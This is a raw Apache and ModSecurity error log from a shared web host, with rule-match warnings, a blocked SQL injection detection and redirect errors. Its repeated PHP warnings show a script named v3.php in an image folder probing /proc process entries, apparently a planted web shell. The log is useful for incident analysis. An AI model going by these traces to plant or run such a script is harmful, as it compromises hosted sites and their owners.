[Mon May 11 19:19:30.207919 2026] [security2:error] [pid 1424905:tid 1424915] [client 129.226.174.80:35618] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agIPooW8yzYoWG_eyCXSogAAAUc"]
[Mon May 11 19:19:58.716018 2026] [security2:error] [pid 1501831:tid 1501844] [client 43.163.104.54:34666] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIPvlNddpkriGUb6ZVVeAAAAQs"]
PHP Warning:  filesize(): stat failed for /proc/225/task/225/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/225/task/225/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/225/task/225/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/225/task/225/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/225/task/225/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/225/task/225/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 19:20:16.210342 2026] [authz_core:error] [pid 1502013:tid 1502039] [client 216.73.216.110:17320] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/cocur/slugify/tests/Bridge/Nette/error_log
PHP Warning:  filesize(): stat failed for /proc/215/task/215/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/215/task/215/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/215/task/215/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/215/task/215/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/215/task/215/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/215/task/215/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 19:20:16.818812 2026] [security2:error] [pid 1516058:tid 1516112] [client 49.51.183.75:60848] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/purple-line/"] [unique_id "agIP0CMeXtzav-mi9SyO3gAAANY"]
PHP Warning:  filesize(): stat failed for /proc/898/task/898/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/898/task/898/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/898/task/898/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/898/task/898/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/898/task/898/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/898/task/898/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 19:20:36.537087 2026] [security2:error] [pid 1424905:tid 1424928] [client 43.130.105.21:56582] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIP5IW8yzYoWG_eyCXTKwAAAVQ"]
[Mon May 11 19:21:26.699629 2026] [authz_core:error] [pid 1501883:tid 1501893] [client 47.128.125.57:46508] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/block-bindings/error_log
[Mon May 11 19:21:43.157223 2026] [security2:error] [pid 1502013:tid 1502050] [client 170.106.163.84:56896] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/nos-bieres"] [unique_id "agIQJ5Yn-x0CHsbEbP2K9gAAAJg"]
[Mon May 11 19:21:50.896890 2026] [security2:error] [pid 1502013:tid 1502032] [client 170.106.163.84:60430] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/nos-bieres/"] [unique_id "agIQLpYn-x0CHsbEbP2K_QAAAII"], referer: http://www.labaujue.com/nos-bieres
PHP Warning:  filesize(): stat failed for /proc/328/task/328/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/328/task/328/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/328/task/328/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/328/task/328/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/328/task/328/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/328/task/328/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 19:22:10.670051 2026] [authz_core:error] [pid 1424905:tid 1424918] [client 47.128.125.51:28026] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/SimplePie/src/error_log
PHP Warning:  filesize(): stat failed for /proc/949/task/949/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/949/task/949/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/949/task/949/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/949/task/949/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/949/task/949/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/949/task/949/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 19:22:29.580089 2026] [security2:error] [pid 1516058:tid 1516110] [client 43.157.142.101:52746] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cpc-entreprises.com"] [uri "/"] [unique_id "agIQVSMeXtzav-mi9SyPyQAAANQ"]
[Mon May 11 19:22:32.447475 2026] [security2:error] [pid 1502013:tid 1502044] [client 43.157.142.101:60278] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cpc-entreprises.com"] [uri "/"] [unique_id "agIQWJYn-x0CHsbEbP2LPwAAAJE"], referer: http://www.cpc-entreprises.com
[Mon May 11 19:22:57.509679 2026] [security2:error] [pid 1501831:tid 1501850] [client 43.131.36.84:40890] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agIQcVNddpkriGUb6ZVWSAAAARE"]
[Mon May 11 19:23:00.978882 2026] [security2:error] [pid 1516058:tid 1516099] [client 43.131.36.84:59650] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agIQdCMeXtzav-mi9SyP6gAAAMk"], referer: http://pole-de-mobilite-regional.com
[Mon May 11 19:23:04.332231 2026] [:error] [pid 1424905:tid 1424912] [client 51.68.111.238:29899] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 19:23:32.721443 2026] [core:error] [pid 1516058:tid 1516113] [client 114.119.148.14:31597] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://dev.rentparadise.fr/accommodation/mobil-home-excellence-3/
[Mon May 11 19:23:32.721484 2026] [core:error] [pid 1516058:tid 1516113] [client 114.119.148.14:31597] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://dev.rentparadise.fr/accommodation/mobil-home-excellence-3/
[Mon May 11 19:24:21.649712 2026] [security2:error] [pid 1501883:tid 1501900] [client 43.165.167.72:36258] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/contact/mentions-legales/"] [unique_id "agIQxTP5Q_-MBliRCAxHjgAAAA8"]
[Mon May 11 19:24:26.234310 2026] [security2:error] [pid 1502013:tid 1502036] [client 43.153.123.3:56532] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tct-telecom.fr"] [uri "/wp-content/uploads/2023/04/cropped-Logo_TCT-PRO_fond-blanc-270x270.webp"] [unique_id "agIQypYn-x0CHsbEbP2L0QAAAIc"]
[Mon May 11 19:24:55.128239 2026] [security2:error] [pid 1516058:tid 1516099] [client 43.156.156.96:57034] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "apoe.fr"] [uri "/"] [unique_id "agIQ5yMeXtzav-mi9SyQegAAAMk"], referer: http://apoe.fr
[Mon May 11 19:25:23.424542 2026] [security2:error] [pid 1501883:tid 1501897] [client 146.103.113.162:57124] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: b63410cf20bdaaf134ba9a6129108114||1778522109||1778521749"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agIRAzP5Q_-MBliRCAxH1wAAAAw"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 19:25:23.424958 2026] [security2:error] [pid 1501883:tid 1501897] [client 146.103.113.162:57124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agIRAzP5Q_-MBliRCAxH1wAAAAw"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 19:25:23.425745 2026] [security2:error] [pid 1501883:tid 1501897] [client 146.103.113.162:57124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agIRAzP5Q_-MBliRCAxH1wAAAAw"], referer: http://la-grande-fabrique.com/?p=4057
PHP Warning:  filesize(): stat failed for /proc/690/task/690/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/690/task/690/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/690/task/690/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/690/task/690/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/690/task/690/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/690/task/690/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 19:26:26.899484 2026] [security2:error] [pid 1501883:tid 1501906] [client 43.153.208.49:46150] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "dev.rentparadise.fr"] [uri "/"] [unique_id "agIRQjP5Q_-MBliRCAxIOwAAABU"]
[Mon May 11 19:26:29.250383 2026] [security2:error] [pid 1502013:tid 1502031] [client 43.153.208.49:57136] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "dev.rentparadise.fr"] [uri "/dev/"] [unique_id "agIRRZYn-x0CHsbEbP2MaAAAAIE"], referer: http://dev.rentparadise.fr
[Mon May 11 19:26:29.255529 2026] [core:error] [pid 1502013:tid 1502031] [client 43.153.208.49:57136] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://dev.rentparadise.fr
[Mon May 11 19:26:29.255558 2026] [core:error] [pid 1502013:tid 1502031] [client 43.153.208.49:57136] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://dev.rentparadise.fr
[Mon May 11 19:26:35.432127 2026] [authz_core:error] [pid 1511173:tid 1511198] [client 216.73.216.110:33926] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/coursecopy/classes/error_log
[Mon May 11 19:26:46.628879 2026] [core:error] [pid 1511173:tid 1511197] [client 114.119.140.85:39669] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://dev.rentparadise.fr/accommodation-facility/ossature-pvc/
[Mon May 11 19:26:46.629009 2026] [core:error] [pid 1511173:tid 1511197] [client 114.119.140.85:39669] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://dev.rentparadise.fr/accommodation-facility/ossature-pvc/
[Mon May 11 19:27:03.871414 2026] [security2:error] [pid 1501831:tid 1501856] [client 43.154.140.188:54538] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/index.php"] [unique_id "agIRZ1NddpkriGUb6ZVXbAAAARc"]
[Mon May 11 19:27:04.367370 2026] [authz_core:error] [pid 1511173:tid 1511197] [client 47.128.125.9:46376] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/SimplePie/error_log
[Mon May 11 19:28:57.581499 2026] [:error] [pid 1501831:tid 1501848] [client 43.166.237.57:52450] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:29:11.582929 2026] [core:error] [pid 1511173:tid 1511196] [client 74.7.175.175:37670] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:29:11.583595 2026] [core:error] [pid 1511173:tid 1511196] [client 74.7.175.175:37670] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:29:35.399920 2026] [security2:error] [pid 1511173:tid 1511186] [client 43.157.153.236:47918] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/filature/"] [unique_id "agIR__jVc-A-CSptvm1U0QAAAEo"]
[Mon May 11 19:29:48.592218 2026] [proxy_fcgi:error] [pid 1516058:tid 1516104] [client 145.239.10.137:45243] AH01071: Got error 'Primary script unknown', referer: http://la-grande-fabrique.com/admin.php
[Mon May 11 19:30:10.460170 2026] [authz_core:error] [pid 1502013:tid 1502033] [client 47.128.58.57:19720] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/rest-api/error_log
[Mon May 11 19:30:17.786449 2026] [security2:error] [pid 1516058:tid 1516101] [client 49.51.73.183:33672] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agISKSMeXtzav-mi9SySjAAAAMs"]
[Mon May 11 19:30:42.451238 2026] [security2:error] [pid 1511173:tid 1511193] [client 49.51.183.220:50078] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/nos-realisations"] [unique_id "agISQvjVc-A-CSptvm1VYgAAAFE"]
[Mon May 11 19:30:48.185376 2026] [security2:error] [pid 1501831:tid 1501852] [client 43.156.114.184:59528] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "217.113.192.26"] [uri "/"] [unique_id "agISSFNddpkriGUb6ZVZEQAAARM"]
[Mon May 11 19:30:51.439567 2026] [security2:error] [pid 1501883:tid 1501895] [client 49.51.183.220:54850] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/nos-realisations/"] [unique_id "agISSzP5Q_-MBliRCAxJowAAAAo"], referer: https://letamsgarage.fr/nos-realisations#evenements
